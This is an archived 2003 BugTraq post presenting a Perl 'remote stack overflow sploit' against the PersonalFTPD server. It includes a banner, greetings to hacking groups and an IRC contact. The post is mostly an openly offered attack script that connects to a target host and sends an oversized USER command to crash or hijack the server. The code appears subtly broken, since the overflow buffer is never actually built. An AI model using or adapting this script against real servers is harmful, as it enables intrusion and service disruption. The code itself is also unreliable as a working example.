BugTraq
Remote Stack Overflow exploit for Personal FTPD May 08 2003 08:11AM
subj (r2subj3ct dwclan org)


#!/usr/bin/perl

use IO::Socket;

##########################################################

# #

# Remote Stack Overflow sploit for PersonalFTPD #

# If wanna talk with me find me on irc #

# irc.irochka.net #dwc, #global, #phreack #

# ###################################################### #

# thanx to kabuto, drG4njubas, fnq #

# gr33tz to dhg, gipshack, rsteam, blacktigerz #

# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 #

# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z #

# ###################################################### #

# Vulnerability links: #

# http://security.nnov.ru/search/document.asp?docid=4309 #

# http://www.securityfocus.com/archive/1/316958 #

# #

##########################################################

$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";

print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";

print "[..] by subj | dwc :: big 10x to Kabuto [..]\n";

print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

$count_param=@ARGV;

$n="0";

if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer

size\n\n"; exit; }

while ($n<$count_param) {

if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}

if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}

if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}

$n++;

}

&connect;

sub connect

{

$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port",

Proto => "tcp")

|| die "Can\'t connect to $server port $port\n";

print $sock "USER $buffer\n";

print "Buffer has beens sended...";

}

close($sock);

exit;

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus